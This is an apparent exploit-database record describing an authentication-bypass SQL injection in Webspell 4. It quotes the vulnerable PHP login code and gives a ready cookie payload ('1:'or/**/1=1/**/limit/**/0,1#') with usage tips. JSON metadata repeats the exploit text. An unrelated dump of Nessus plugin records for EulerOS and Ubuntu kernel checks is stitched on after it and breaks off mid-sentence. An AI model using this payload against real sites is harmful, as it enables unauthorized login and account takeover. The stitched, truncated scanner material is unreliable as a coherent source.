ID 1337DAY-ID-4594 Type zdt Reporter 0day Today Team Modified 2009-01-03T00:00:00
Description
Exploit for unknown platform in category web applications
====================================================
Webspell 4 (Auth Bypass) SQL Injection Vulnerability
====================================================
#Webspell Login Bypass
#Found by: h0yt3r
#
##
#Checklogin.php Line 60:
#
# setcookie("ws_auth", $ds['userID'].":".$ws_pwd, time()+($sessionduration*60*60));
# $login = 1;
#
##
#_functions.php Line 253:
#
# $login_per_cookie = false;
# if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {
# $login_per_cookie = true;
# $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];
# }
##
#src/login.php:
#
# global $userID, $loggedin;
#
# $userID = 0;
# $loggedin=false;
#
# if(isset($_SESSION['ws_auth'])) {
# if(stristr($_SESSION['ws_auth'], "userid")===FALSE){
# $authent = explode(":", $_SESSION['ws_auth']);
# $ws_user = sprintf('%u', $authent[0]);
#
# // ws_pwd must be a string without spaces and with a maximum length of 32 <- ???
# $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);
#
# if(isset($ws_user) AND isset($ws_pwd)) {
#
# $check = safe_query("SELECT userID FROM ".PREFIX."user WHERE userID='$ws_user' AND password='$ws_pwd'");
#
# while($ds=mysql_fetch_array($check)) {
# $loggedin=true;
# $userID=$ds['userID'];
# }
# }
# } else die();
# }
# ?>
#
#
####
// ws_pwd must be a string without spaces and with a maximum length of 32
$ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);
What the fuck is this crap?!
The password half, $authent[1], is only stripped of spaces and truncated to 32 characters before being interpolated into the query; it is never escaped, so $_COOKIE['ws_auth'] can be exploited by something like this:
1:'or/**/1=1/**/limit/**/0,1# (# <- is a comment, dont forget...)
And btw:
$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];
So don't forget to delete the session first - the cookie is only copied into $_SESSION['ws_auth'] when no session value is set yet...
Bad thing: this only works with magic_quotes == off, since otherwise the quote in the cookie value is escaped before it reaches the query.
But they already have an escaping function:
#_functions.php:74
#function sql_quote($value) {
#
# if( get_magic_quotes_gpc() ) {
# $value = stripslashes( $value );
# }
# if( function_exists( "mysql_real_escape_string" ) ) {
# $value = mysql_real_escape_string( $value );
# }
# else
# {
# $value = addslashes( $value );
# }
# return $value;
#}
And why in the world isn't it used?! src/login.php interpolates $ws_user and $ws_pwd straight into the query without passing them through sql_quote().
~END~
# 0day.today [2018-03-10] #
{"hash": "5b768228654b30091d4c53b6a6c425a32ef476265c9fc0515972296822b83a1a", "id": "1337DAY-ID-4594", "lastseen": "2018-03-11T01:10:00", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ee43afdb84ed7cbc2768aa19f785512e", "key": "href"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "modified"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "4c0250142a1f9257b18f040d3c5103f3", "key": "sourceData"}, {"hash": "167a287a41e8d4627b7829f39d9558fe", "key": "sourceHref"}, {"hash": "8ddfff8606576b32069f96f65dd71334", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-03-11T01:10:00"}, "dependencies": {"references": [{"type": "cloudfoundry", "idList": ["CFOUNDRY:CD984900F2B581632FB9816EFFC5EA33"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843627", "OPENVAS:1361412562310843626"]}, {"type": "nessus", "idList": ["UBUNTU_USN-3753-2.NASL", "UBUNTU_USN-3753-1.NASL", "APPLETV_9_2_2.NASL"]}, {"type": "ubuntu", "idList": ["USN-3753-2", "USN-3753-1"]}, {"type": "metasploit", "idList": ["MSF:POST/LINUX/GATHER/ENUM_COMMANDS", "MSF:POST/LINUX/MANAGE/IPTABLES_REMOVAL", "MSF:POST/LINUX/MANAGE/PSEUDO_SHELL", "MSF:EXPLOIT/LINUX/HTTP/TRENDMICRO_IMSVA_WIDGET_EXEC", "MSF:EXPLOIT/WINDOWS/HTTP/EASYCHATSERVER_SEH", "MSF:EXPLOIT/UNIX/WEBAPP/WP_FOXYPRESS_UPLOAD", "MSF:EXPLOIT/UNIX/WEBAPP/WP_PLATFORM_EXEC"]}, {"type": "zdt", "idList": ["1337DAY-ID-26798", "1337DAY-ID-24887", 
"1337DAY-ID-24882"]}, {"type": "exploitdb", "idList": ["EDB-ID:39402"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135533"]}], "modified": "2018-03-11T01:10:00"}, "vulnersScore": 0.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/4594", "description": "Exploit for unknown platform in category web applications", "title": "Webspell 4 (Auth Bypass) SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "efd5f079e7cef6cd1407fb995dfefd412b2d52be8b63cda3b24963f682dd9cc5", "id": "1337DAY-ID-4594", "lastseen": "2016-04-20T00:53:42", "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T00:53:42"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8934742e7a8f58285232341e99256ad0", "key": "sourceHref"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "published"}, {"hash": "8ddfff8606576b32069f96f65dd71334", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "modified"}, {"hash": "bab414f2c90e6fdf0fe3b539f77ae9f3", "key": "sourceData"}, {"hash": "5ac8c50ee8dcb67324314d58f44dc9be", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/4594", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "Webspell 4 (Auth Bypass) SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nWebspell 4 (Auth Bypass) SQL Injection 
Vulnerability\r\n====================================================\r\n\r\n\r\n#Webspell Login Bypass\r\n#Found by: h0yt3r\r\n#\r\n##\r\n#Checklogin.php Line 60:\r\n#\r\n# setcookie(\"ws_auth\", $ds['userID'].\":\".$ws_pwd, time()+($sessionduration*60*60));\r\n# $login = 1;\r\n#\r\n##\r\n#_functions.php Line 253:\r\n#\r\n# $login_per_cookie = false;\r\n# if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {\r\n# $login_per_cookie = true;\r\n# $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\n# }\r\n##\r\n#src/login.php:\r\n#\r\n# global $userID, $loggedin;\r\n#\r\n# $userID = 0;\r\n# $loggedin=false;\r\n#\r\n# if(isset($_SESSION['ws_auth'])) {\r\n# if(stristr($_SESSION['ws_auth'], \"userid\")===FALSE){\r\n# $authent = explode(\":\", $_SESSION['ws_auth']);\r\n# $ws_user = sprintf('%u', $authent[0]);\r\n#\r\n# // ws_pwd must be a string without spaces and with a maximum length of 32 <- ???\r\n# $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n#\r\n# if(isset($ws_user) AND isset($ws_pwd)) {\r\n#\r\n# $check = safe_query(\"SELECT userID FROM \".PREFIX.\"user WHERE userID='$ws_user' AND password='$ws_pwd'\");\r\n#\r\n# while($ds=mysql_fetch_array($check)) {\r\n# $loggedin=true;\r\n# $userID=$ds['userID'];\r\n# }\r\n# }\r\n# } else die();\r\n# }\r\n# ?>\r\n#\r\n#\r\n####\r\n\r\n// ws_pwd must be a string without spaces and with a maximum length of 32\r\n $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n\r\nWuta fuck is dis crap?!\r\n$_COOKIE['ws_auth'] can be exploited by somting like dis:\r\n1:'or/**/1=1/**/limit/**/0,1# (# <- is a comment, dont forget...)\r\nAnd btw:\r\n$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\nSo dont foget to delete teh session...\r\nBad thing: Only works wit magic_quotes == off\r\n\r\nBut they got some function:\r\n#_functions.php:74\r\n#function sql_quote($value) {\r\n#\r\n# if( get_magic_quotes_gpc() ) {\r\n# $value = stripslashes( $value );\r\n# }\r\n# if( function_exists( \"mysql_real_escape_string\" ) 
) {\r\n# $value = mysql_real_escape_string( $value );\r\n# }\r\n# else\r\n# {\r\n# $value = addslashes( $value );\r\n# }\r\n# return $value;\r\n#}\r\nAnd why in the world isnt it used?!\r\n\r\n~END~\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2009-01-03T00:00:00", "references": [], "reporter": "0day Today Team", "modified": "2009-01-03T00:00:00", "href": "http://0day.today/exploit/description/4594"}, "lastseen": "2016-04-20T00:53:42", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nWebspell 4 (Auth Bypass) SQL Injection Vulnerability\r\n====================================================\r\n\r\n\r\n#Webspell Login Bypass\r\n#Found by: h0yt3r\r\n#\r\n##\r\n#Checklogin.php Line 60:\r\n#\r\n# setcookie(\"ws_auth\", $ds['userID'].\":\".$ws_pwd, time()+($sessionduration*60*60));\r\n# $login = 1;\r\n#\r\n##\r\n#_functions.php Line 253:\r\n#\r\n# $login_per_cookie = false;\r\n# if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {\r\n# $login_per_cookie = true;\r\n# $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\n# }\r\n##\r\n#src/login.php:\r\n#\r\n# global $userID, $loggedin;\r\n#\r\n# $userID = 0;\r\n# $loggedin=false;\r\n#\r\n# if(isset($_SESSION['ws_auth'])) {\r\n# if(stristr($_SESSION['ws_auth'], \"userid\")===FALSE){\r\n# $authent = explode(\":\", $_SESSION['ws_auth']);\r\n# $ws_user = sprintf('%u', $authent[0]);\r\n#\r\n# // ws_pwd must be a string without spaces and with a maximum length of 32 <- ???\r\n# $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n#\r\n# if(isset($ws_user) AND isset($ws_pwd)) {\r\n#\r\n# $check = safe_query(\"SELECT userID FROM \".PREFIX.\"user WHERE userID='$ws_user' AND password='$ws_pwd'\");\r\n#\r\n# while($ds=mysql_fetch_array($check)) {\r\n# $loggedin=true;\r\n# $userID=$ds['userID'];\r\n# }\r\n# }\r\n# } else die();\r\n# }\r\n# 
?>\r\n#\r\n#\r\n####\r\n\r\n// ws_pwd must be a string without spaces and with a maximum length of 32\r\n $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n\r\nWuta fuck is dis crap?!\r\n$_COOKIE['ws_auth'] can be exploited by somting like dis:\r\n1:'or/**/1=1/**/limit/**/0,1# (# <- is a comment, dont forget...)\r\nAnd btw:\r\n$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\nSo dont foget to delete teh session...\r\nBad thing: Only works wit magic_quotes == off\r\n\r\nBut they got some function:\r\n#_functions.php:74\r\n#function sql_quote($value) {\r\n#\r\n# if( get_magic_quotes_gpc() ) {\r\n# $value = stripslashes( $value );\r\n# }\r\n# if( function_exists( \"mysql_real_escape_string\" ) ) {\r\n# $value = mysql_real_escape_string( $value );\r\n# }\r\n# else\r\n# {\r\n# $value = addslashes( $value );\r\n# }\r\n# return $value;\r\n#}\r\nAnd why in the world isnt it used?!\r\n\r\n~END~\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-10] #", "published": "2009-01-03T00:00:00", "references": [], "reporter": "0day Today Team", "modified": "2009-01-03T00:00:00", "href": "https://0day.today/exploit/description/4594"}
{"nessus": [{"lastseen": "2019-11-01T02:07:09", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The snd_msndmidi_input_read function in\n sound/isa/msnd/msnd_midi.c in the Linux kernel through\n 4.11.7 allows local users to cause a denial of service\n (over-boundary access) or possibly have unspecified\n other impact by changing the value of a message queue\n head pointer between two kernel reads of that value,\n aka a ", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1523.NASL", "href": "https://www.tenable.com/plugins/nessus/124976", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1523)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124976);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2013-2899\",\n \"CVE-2014-3601\",\n \"CVE-2014-6410\",\n \"CVE-2015-0572\",\n \"CVE-2015-8709\",\n \"CVE-2015-8953\",\n \"CVE-2016-10150\",\n \"CVE-2016-3841\",\n \"CVE-2016-4805\",\n \"CVE-2016-9120\",\n \"CVE-2017-10663\",\n \"CVE-2017-11473\",\n \"CVE-2017-12168\",\n \"CVE-2017-12193\",\n \"CVE-2017-14489\",\n \"CVE-2017-16644\",\n \"CVE-2017-16648\",\n \"CVE-2017-7533\",\n \"CVE-2017-9985\",\n \"CVE-2018-10879\"\n );\n script_bugtraq_id(\n 62046,\n 69489,\n 69799\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1523)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the 
versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The snd_msndmidi_input_read function in\n sound/isa/msnd/msnd_midi.c in the Linux kernel through\n 4.11.7 allows local users to cause a denial of service\n (over-boundary access) or possibly have unspecified\n other impact by changing the value of a message queue\n head pointer between two kernel reads of that value,\n aka a 'double fetch' vulnerability.(CVE-2017-9985)\n\n - An assertion failure issue was found in the Linux\n kernel's KVM hypervisor module built to support\n visualization on ARM64 architecture platforms. The\n failure could occur while accessing Performance\n Monitors Cycle Count Register (PMCCNTR) from a guest. A\n privileged guest user could use this flaw to crash the\n host kernel resulting in denial of\n service.(CVE-2017-12168)\n\n - The iscsi_if_rx() function in\n 'drivers/scsi/scsi_transport_iscsi.c' in the Linux\n kernel from v2.6.24-rc1 through 4.13.2 allows local\n users to cause a denial of service (a system panic) by\n making a number of certain syscalls by leveraging\n incorrect length validation in the kernel\n code.(CVE-2017-14489)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The dvb frontend management subsystem in the Linux\n kernel contains a use-after-free which can allow a\n malicious user to write to memory that may be assigned\n to another kernel structure. This could create memory\n corruption, panic, or possibly other side\n affects.(CVE-2017-16648)\n\n - It was found that the Linux kernel's IPv6\n implementation mishandled socket options. 
A local\n attacker could abuse concurrent access to the socket\n options to escalate their privileges, or cause a denial\n of service (use-after-free and system crash) via a\n crafted sendmsg system call.(CVE-2016-3841)\n\n - A flaw was found in the Linux kernel's ext4 filesystem.\n A local user can cause a use-after-free in\n ext4_xattr_set_entry function and a denial of service\n or unspecified other impact may occur by renaming a\n file in a crafted ext4 filesystem\n image.(CVE-2018-10879)\n\n - A race condition was found in the Linux kernel, present\n since v3.14-rc1 through v4.12. The race happens between\n threads of inotify_handle_event() and vfs_rename()\n while running the rename operation against the same\n file. As a result of the race the next slab data or the\n slab's free list pointer can be corrupted with\n attacker-controlled data, which may lead to the\n privilege escalation.(CVE-2017-7533)\n\n - A privilege-escalation vulnerability was discovered in\n the Linux kernel built with User Namespace\n (CONFIG_USER_NS) support. The flaw occurred when the\n ptrace() system call was used on a root-owned process\n to enter a user namespace. A privileged namespace user\n could exploit this flaw to potentially escalate their\n privileges on the system, outside the original\n namespace.(CVE-2015-8709)\n\n - Use-after-free vulnerability in\n drivers/net/ppp/ppp_generic.c in the Linux kernel\n before 4.5.2 allows local users to cause a denial of\n service (memory corruption and system crash, or\n spinlock) or possibly have unspecified other impact by\n removing a network namespace, related to the\n ppp_register_net_channel and ppp_unregister_channel\n functions.(CVE-2016-4805)\n\n - A flaw was found in the way the Linux kernel's\n kvm_iommu_map_pages() function handled IOMMU mapping\n failures. 
A privileged user in a guest with an assigned\n host device could use this flaw to crash the\n host.(CVE-2014-3601)\n\n - A flaw was found in the Linux kernel's implementation\n of associative arrays introduced in 3.13. This\n functionality was backported to the 3.10 kernels in Red\n Hat Enterprise Linux 7. The flaw involved a null\n pointer dereference in assoc_array_apply_edit() due to\n incorrect node-splitting in assoc_array implementation.\n This affects the keyring key type and thus key addition\n and link creation operations may cause the kernel to\n panic.(CVE-2017-12193)\n\n - Multiple race conditions in drivers/char/adsprpc.c and\n drivers/char/adsprpc_compat.c in the ADSPRPC driver for\n the Linux kernel 3.x, as used in Qualcomm Innovation\n Center (QuIC) Android contributions for MSM devices and\n other products, allow attackers to cause a denial of\n service (zero-value write) or possibly have unspecified\n other impact via a COMPAT_FASTRPC_IOCTL_INVOKE_FD ioctl\n call.(CVE-2015-0572)\n\n - The sanity_check_ckpt function in fs/f2fs/super.c in\n the Linux kernel before version 4.12.4 does not\n validate the blkoff and segno arrays. This allows an\n unprivileged, local user to cause a system panic and\n DoS. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out, although we\n believe it is unlikely.(CVE-2017-10663)\n\n - A stack overflow flaw caused by infinite recursion was\n found in the way the Linux kernel's Universal Disk\n Format (UDF) file system implementation processed\n indirect Information Control Blocks (ICBs). 
An attacker\n with physical access to the system could use a\n specially crafted UDF image to crash the\n system.(CVE-2014-6410)\n\n - Race condition in the ion_ioctl function in\n drivers/staging/android/ion/ion.c in the Linux kernel\n before 4.6 allows local users to gain privileges or\n cause a denial of service (use-after-free) by calling\n ION_IOC_FREE on two CPUs at the same\n time.(CVE-2016-9120)\n\n - drivers/hid/hid-picolcd_core.c in the Human Interface\n Device (HID) subsystem in the Linux kernel through\n 3.11, when CONFIG_HID_PICOLCD is enabled, allows\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and OOPS) via a\n crafted device.(CVE-2013-2899)\n\n - A flaw was found in the Linux kernel's implementation\n of overlayfs. An attacker can leak file resources in\n the system by opening a large file with write\n permissions on a overlay filesystem that is\n insufficient to deal with the size of the write.When\n unmounting the underlying device, the system is unable\n to free an inode and this will consume resources.\n Repeating this for all available inodes and memory will\n create a denial of service situation.(CVE-2015-8953)\n\n - Buffer overflow in the mp_override_legacy_irq()\n function in arch/x86/kernel/acpi/boot.c in the Linux\n kernel through 4.12.2 allows local users to gain\n privileges via a crafted ACPI table.(CVE-2017-11473)\n\n - Use-after-free vulnerability in the\n kvm_ioctl_create_device function in virt/kvm/kvm_main.c\n in the Linux kernel before 4.8.13 allows host OS users\n to cause a denial of service (host OS crash) or\n possibly gain privileges via crafted ioctl calls on the\n /dev/kvm device.(CVE-2016-10150)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1523\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ab359ca\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2019-11-03T12:34:20", "bulletinFamily": "scanner", "description": "USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. 
A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3753-2.NASL", "href": "https://www.tenable.com/plugins/nessus/112112", "published": "2018-08-24T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerabilities (USN-3753-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3753-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112112);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_xref(name:\"USN\", value:\"3753-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerabilities (USN-3753-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. 
